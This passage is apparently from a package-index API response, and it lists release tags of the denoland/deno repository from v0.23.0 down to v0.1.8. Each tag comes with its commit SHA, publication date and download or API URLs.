noland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0